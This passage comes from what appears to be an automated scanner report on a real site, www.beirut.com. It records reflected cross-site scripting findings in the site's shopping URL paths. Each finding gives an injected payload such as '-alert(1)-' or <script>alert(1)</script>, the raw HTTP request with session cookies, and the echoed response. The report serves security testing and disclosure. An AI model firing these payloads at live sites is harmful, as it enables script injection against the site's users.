GET /Shopping/Home-Furnishings/4120758082598bf'-alert(1)-'dd8bdd55a7d/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:22:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082598bf'-alert(1)-'dd8bdd55a7d/Tools-Hardware/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1050. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81b6'-alert(1)-'a9e5bf09def was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Tools-Hardwared81b6'-alert(1)-'a9e5bf09def/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Tools-Hardwared81b6'-alert(1)-'a9e5bf09def/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1051. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e890f'-alert(1)-'c82615d10fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30e890f'-alert(1)-'c82615d10fb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:30:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Tools-Hardware/30e890f'-alert(1)-'c82615d10fb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1052. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7488'-alert(1)-'4b7fda2f3b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingd7488'-alert(1)-'4b7fda2f3b5/Shopping-Centers/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:50:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppingd7488'-alert(1)-'4b7fda2f3b5/Shopping-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1053. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae3e"><a>363c9f6e92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping8ae3e"><a>363c9f6e92d/Shopping-Centers/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:39:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping8ae3e"><a>363c9f6e92d">
...[SNIP]...

4.1054. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1292a<script>alert(1)</script>b54ac23f37c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Shopping-Centers1292a<script>alert(1)</script>b54ac23f37c/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:54:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Shopping Centers1292a<script>alert(1)</script>b54ac23f37c <a href="#" id="backlink">
...[SNIP]...

4.1055. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f7ef'-alert(1)-'18ec9d51012 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centers1f7ef'-alert(1)-'18ec9d51012/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:54:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centers1f7ef'-alert(1)-'18ec9d51012';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1056. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d8af'-alert(1)-'44e30860094 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping8d8af'-alert(1)-'44e30860094/Shopping-Centers/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping8d8af'-alert(1)-'44e30860094/Shopping-Centers/492064852/Commercial-Centers/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1057. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abd55"><a>64eb7a78900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingabd55"><a>64eb7a78900/Shopping-Centers/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:40:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingabd55"><a>64eb7a78900">
...[SNIP]...

4.1058. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5ffd'-alert(1)-'c7888ff4bbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centersa5ffd'-alert(1)-'c7888ff4bbb/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Shopping-Centersa5ffd'-alert(1)-'c7888ff4bbb/492064852/Commercial-Centers/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1059. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 346f3<script>alert(1)</script>17b8174ebbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Shopping-Centers346f3<script>alert(1)</script>17b8174ebbc/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:52:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Shopping Centers346f3<script>alert(1)</script>17b8174ebbc <a href="#" id="backlink">
...[SNIP]...

4.1060. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b47'-alert(1)-'290b845ce07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centers/49206485213b47'-alert(1)-'290b845ce07/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:57:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Shopping-Centers/49206485213b47'-alert(1)-'290b845ce07/Commercial-Centers/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1061. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8541e'-alert(1)-'ca4337fdb27 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Shopping-Centers/492064852/Commercial-Centers8541e'-alert(1)-'ca4337fdb27/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:01:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Shopping-Centers/492064852/Commercial-Centers8541e'-alert(1)-'ca4337fdb27/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1062. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a81fa'-alert(1)-'2d7ae7ee7d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

